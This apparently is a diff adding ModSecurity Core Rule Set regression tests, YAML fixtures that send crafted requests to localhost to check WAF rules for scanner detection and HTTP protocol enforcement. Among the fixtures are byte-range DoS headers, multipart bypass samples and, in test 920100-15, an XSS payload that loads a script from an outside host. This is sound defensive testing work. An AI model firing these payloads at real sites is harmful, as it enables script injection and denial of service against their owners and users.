Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Arachni/0.2.1
method: GET
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "913100"
-
test_title: 913100-3
desc: Request Indicates a Security Scanner Scanned the Site (913100) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: w3af.sourceforge.net
method: GET
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "913100"
-
test_title: 913100-4
desc: "Scanner identification based on User-agent field"
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
User-agent: "nessus"
uri: "/"
output:
log_contains: id "913100"

49
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913110.yaml Normal file
View File

@@ -0,0 +1,49 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 913110.yaml
tests:
-
test_title: 913110-1
desc: Request Indicates a Security Scanner Scanned the Site (913110) from old modsec
regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Acunetix-Product: WVS/5.0 (Acunetix Web Vulnerability Scanner - EVALUATION)
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET
CLR 2.0.50727)
method: GET
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "913110"
-
test_title: 913110-2
desc: "Scanner identification based on custom header"
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
X-Scanner: "whatever"
uri: "/"
output:
log_contains: id "913110"

63
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913120.yaml Normal file
View File

@@ -0,0 +1,63 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 913120.yaml
tests:
-
test_title: 913120-1
desc: Request Indicates a Security Scanner Scanned the Site (913120) from old modsec
regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET
CLR 2.0.50727)
method: GET
port: 80
uri: /nessustest
version: HTTP/1.0
output:
log_contains: id "913120"
-
test_title: 913120-2
desc: IBM fingerprint from (http://www-01.ibm.com/support/docview.wss?uid=swg21293132)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
uri: /AppScan_fingerprint/MAC_ADDRESS_01234567890.html?9ABCDG1
version: HTTP/1.0
output:
log_contains: id "913120"
-
test_title: 913120-3
desc: "Scanner identification based on uri"
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
version: HTTP/1.0
uri: "/nessus_is_probing_you_"
output:
log_contains: id "913120"

287
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml Normal file
View File

@@ -0,0 +1,287 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920100.yaml"
description: "Tests to trigger, or not trigger 920100"
tests:
-
# Standard GET request
test_title: 920100-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/"
version: "HTTP/1.1"
output:
no_log_contains: "id \"920100\""
-
# Request has tab (\t) before request method - Apache complains
# AH00126: Invalid URI in request GET / HTTP/1.1
test_title: 920100-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: " GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/"
version: "HTTP/1.1"
output:
status: 400
-
# Perfectly valid OPTIONS request
test_title: 920100-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "OPTIONS"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "*"
version: "HTTP/1.1"
output:
no_log_contains: "id \"920100\""
-
# Valid CONNECT request however this is disabled by Apache default
test_title: 920100-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "CONNECT"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "1.2.3.4:80"
version: "HTTP/1.1"
output:
status: [405, 403]
-
# invalid Connect request, domains require ports
test_title: 920100-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "CONNECT"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "www.cnn.com"
version: "HTTP/1.1"
output:
status: 400
-
# This is an acceptable CONNECT request for SSL tunneling
test_title: 920100-6
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "CONNECT"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests #FP"
Host: "localhost"
protocol: "http"
uri: "www.cnn.com:80"
version: "HTTP/1.1"
output:
log_contains: "id \"920100\""
-
# Valid request with query and anchor components
test_title: 920100-7
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/index.html?I=Like&Apples=Today#tag"
version: "HTTP/1.1"
output:
no_log_contains: "id \"920100\""
-
# The colon in the path is not allowed. Apache will block by default
# (20024)The given path is misformatted or contained invalid characters: [client 127.0.0.1:4142] AH00127: Cannot map GET /index.html:80?I=Like&Apples=Today#tag HTTP/1.1 to file
test_title: 920100-8
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/index.html:80?I=Like&Apples=Today#tag"
version: "HTTP/1.1"
output:
status: [400, 403]
-
# Normal Options request with path
test_title: 920100-9
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "OPTIONS"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/"
version: "HTTP/1.1"
output:
no_log_contains: "id \"920100\""
-
# An invalid method with a long name
test_title: 920100-10
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "REALLYLONGUNREALMETHOD"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests # FN"
Host: "localhost"
protocol: "http"
uri: "/"
version: "HTTP/1.1"
output:
log_contains: "id \"920100\""
-
# An invalid request because a backslash is used in uri
# Apache will end up blocking this before it gets to CRS.
# We will need to support OR output tests to fix this
test_title: 920100-11
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests # FN"
Host: "localhost"
protocol: "http"
uri: "\\"
version: "HTTP/1.1"
output:
status: [403, 400]
#log_contains: "id \"920100\""
-
test_title: 920100-12
desc: Invalid HTTP Request Line (920100) - Test 1 from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: "\tGET"
port: 80
uri: /
version: HTTP/1.1
output:
status: 400
-
test_title: 920100-13
desc: Invalid HTTP Request Line (920100) - Test 2 from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: \index.html
version: HTTP\1.0
output:
status: [403, 400]
# log_contains: id "920100"
-
test_title: 920100-14
desc: Invalid HTTP Request Line (920100) - Test 3 from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: '|GET'
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "920100"
-
test_title: 920100-15
desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/demo/xss/xml/vuln.xml.php?input=<script xmlns="http://www.w3.org/1999/xhtml">setTimeout("top.frame2.location=\"javascript:(function () {var x = document.createElement(\\\"script\\\");x.src = \\\"//sdl.me/popup.js?//\\\";document.childNodes\[0\].appendChild(x);}());\"",1000)</script>&//'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
output:
status: [403, 400]
# log_contains: id "920100"

111
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml Normal file
View File

@@ -0,0 +1,111 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920120.yaml"
description: "Tests to trigger rule 920120"
tests:
-
test_title: 920120-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "*/*"
Accept-Language: "en"
Connection: "close"
Referer: "http://localhost/"
Content-Type: "multipart/form-data; boundary=--------397236876"
data:
- "----------397236876"
- "Content-Disposition: form-data; name=\"fileRap\"; filename=\"file=.txt\""
- "Content-Type: text/plain"
- ""
- "555-555-0199@example.com"
- "----------397236876--"
protocol: "http"
output:
log_contains: "id \"920120\""
-
test_title: 920120-2
desc: Attempted multipart/form-data bypass (920120) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------627652292512397580456702590
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv
method: POST
port: 80
uri: /cgi-bin/fup.cgi
version: HTTP/1.1
data:
- '-----------------------------627652292512397580456702590'
- 'Content-Disposition: form-data; name="fi=le"; filename="test"'
- 'Content-Type: text/plain'
- ''
- 'email: security@modsecurity.org'
- ''
- '-----------------------------627652292512397580456702590'
- 'Content-Disposition: form-data; name="note"'
- ''
- Contact info.
- '-----------------------------627652292512397580456702590--'
output:
log_contains: id "920120"
-
test_title: 920120-3
desc: Invalid Request Body (920120) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Type: multipart/form-data; boundary=---------------------------265001916915724
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.1
data:
- '-----------------------------265001916915724'
- 'Content-Disposition: form-data; name="fi;le"; filename="test"'
- 'Content-Type: application/octet-stream'
- ''
- Rotem & Ayala
- ''
- '-----------------------------265001916915724'
- 'Content-Disposition: form-data; name="name"'
- ''
- tt2
- '-----------------------------265001916915724'
- 'Content-Disposition: form-data; name="B1"'
- ''
- Submit
- '-----------------------------265001916915724--'
output:
log_contains: id "920120"

116
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml Normal file
View File

@@ -0,0 +1,116 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920160.yaml"
description: "Tests to trigger rule 920160"
tests:
-
# Non digit Content-Length without content-type
test_title: 920160-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Length: "NotDigits"
protocol: "http"
uri: "/"
output:
status: 400
-
# Non digit content-length with content-type
test_title: 920160-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: "NotDigits"
protocol: "http"
uri: "/"
output:
status: 400
-
# Mixed digit and non digit content length
test_title: 920160-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: "123x"
protocol: "http"
uri: "/"
output:
status: 400
-
# Apache auto corrects for this error now so the log should not contain anything
test_title: 920160-4
desc: Content-Length HTTP header is not numeric (920160) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Length: '3'
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.0
data: abc
output:
status: 200
no_log_contains: id "920160"
-
test_title: 920160-5
desc: Content-Length HTTP header is not numeric (920160) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Length: "3;"
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.0
data: abc
output:
status: [200, 403, 400]
# log_contains: id "920160"

127
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml Normal file
View File

@@ -0,0 +1,127 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920170.yaml"
description: "A Selection of tests to trigger rule 920170"
tests:
-
# POST Request with data (valid)
test_title: 920170-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "hi=test"
uri: "/"
output:
no_log_contains: "id \"920170\""
-
# GET request with data
test_title: 920170-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "hi=test"
uri: "/"
output:
log_contains: "id \"920170\""
-
# Head Request with data
test_title: 920170-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "HEAD"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "hi=test"
uri: "/"
output:
log_contains: "id \"920170\""
-
# GET Request but content length is 0 and data is provided
# Weird HTTP 1.0 support bug in Apache, without newline causes 408
test_title: 920170-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests # Possibly shouldn't pass"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: "0"
data: "hi=test\r\n"
stop_magic: true
protocol: "http"
uri: "/"
output:
no_log_contains: "id \"920170\""
-
# GET request with content length 0 and no data.
test_title: 920170-6
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: "0"
data: ""
protocol: "http"
uri: "/"
output:
no_log_contains: "id \"920170\""
-
test_title: 920170-7
desc: GET or HEAD Request with Body Content (920170) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.0
data: abc
output:
log_contains: id "920170"

90
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml Normal file
View File

@@ -0,0 +1,90 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920180.yaml"
description: "Description"
tests:
-
test_title: 920180-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "hi=test"
protocol: "http"
stop_magic: true
uri: "/"
output:
log_contains: id "920180"
-
test_title: 920180-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "hi=test"
protocol: "http"
uri: "/"
output:
no_log_contains: id "920180"
-
test_title: 920180-3
desc: POST request missing Content-Length Header (920180) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "920180"
-
test_title: 920180-4
desc: Ignore check of CT header if protocol is HTTP/2
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/2.0
output:
no_log_contains: id "920180"

35
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml Executable file
View File

@@ -0,0 +1,35 @@
---
meta:
author: "fgsch"
enabled: true
name: "920181.yaml"
description: "Description"
tests:
-
test_title: 920181-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
uri: "/"
headers:
Host: "localhost"
Accept: "*/*"
Content-Length: 7
Content-Type: "application/x-www-form-urlencoded"
Transfer-Encoding: "chunked"
User-Agent: "ModSecurity CRS 3 Tests"
data:
- "7"
- "foo=bar"
- "0"
- ""
- ""
stop_magic: true
output:
# Apache unsets the Content-Length header if
# Transfer-Encoding is found!
no_log_contains: id "920181"

48
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml Normal file
View File

@@ -0,0 +1,48 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920190.yaml"
description: "Description"
tests:
-
test_title: 920190-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Range: "0-1"
protocol: "http"
uri: "/"
output:
no_log_contains: id "920190"
-
test_title: 920190-2
desc: 'Range: Invalid Last Byte Value (920190) from old modsec regressions'
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Connection: close
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.1
output:
log_contains: id "920190"

170
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml Normal file
View File

@@ -0,0 +1,170 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920200.yaml"
description: "Description"
tests:
-
test_title: 920200-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Range: "bytes=1-10,11-20,21-30,31-40,41-50,51-60"
output:
log_contains: "id \"920200\""
-
# Sample taken from https://github.com/alienwithin/php-utilities/blob/master/apache-byte-range-server-dos/apache_byte_range_server_dos.php
test_title: 920200-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Request-Range: "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10,11-11"
output:
log_contains: "id \"920200\""
-
test_title: 920200-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Range: "bytes=1-10, 11-20, 21-30, 31-40, 41-50"
output:
no_log_contains: "id \"920200\""
-
test_title: 920200-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests #FP"
Host: "localhost"
Range: "bytes=-10,-, 21-30,31-40,41-50,51-500,"
output:
log_contains: "id \"920200\""
-
test_title: 920200-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests #FP"
Host: "localhost"
Range: "bytes=1-,11-20, 21-30,31-40,41-50,51-500"
output:
log_contains: "id \"920200\""
-
test_title: 920200-6
desc: 'Range: Too many fields (920200) from old modsec regressions'
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Connection: close
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.1
output:
log_contains: id "920200"
-
test_title: 920200-7
desc: This should PASS (PL2)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: bytes=10-11, 20-21, 30-31, 40-41, 50-51
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.html
output:
no_log_contains: id "920200"
-
test_title: 920200-8
desc: "This should FAIL with rule 920200 (PL2)"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61"
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.html
output:
log_contains: id "920200"
-
test_title: 920200-9
desc: This should PASS (PL2)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61"
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.pdf
output:
no_log_contains: id "920200"
-
test_title: 920200-10
desc: This should PASS (PL2)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341"
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.pdf
output:
no_log_contains: id "920200"

24
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml Normal file
View File

@@ -0,0 +1,24 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920201.yaml"
description: "Tests for 920201"
tests:
-
test_title: 920201-1
desc: This should FAIL with rule 920201 (PL2)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341, 350-351, 360-361, 370-371, 380-381, 390-391, 400-401, 410-411, 420-421, 430-431, 440-441, 450-451, 460-461, 470-471, 480-481, 490-491, 500-501, 510-511, 520-521, 530-531, 540-541, 550-551, 560-561, 570-571, 580-581, 590-591, 600-601, 610-611, 620-621, 630-631"
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.pdf
output:
log_contains: id "920201"

24
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml Normal file
View File

@@ -0,0 +1,24 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920202.yaml"
description: "Tests for 920202"
tests:
-
test_title: 920202-1
desc: This should FAIL with rule 920202 (PL4)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61"
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.pdf
output:
log_contains: id "920202"

125
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml Normal file
View File

@@ -0,0 +1,125 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920210.yaml"
description: "Tests that trigger rule 920210"
tests:
-
test_title: 920210-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Connection: "keep-alive"
output:
no_log_contains: "id \"920210\""
-
test_title: 920210-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Connection: "keep-alive,keep-alive"
output:
log_contains: "id \"920210\""
-
test_title: 920210-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Connection: "keep-alive,close"
output:
log_contains: "id \"920210\""
-
test_title: 920210-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Connection: "close,close"
output:
log_contains: "id \"920210\""
-
test_title: 920210-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Connection: "User-Agent"
output:
no_log_contains: "id \"920210\""
-
test_title: 920210-6
desc: Multiple/Conflicting Connection Header Data Found (920210) from old modsec
regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
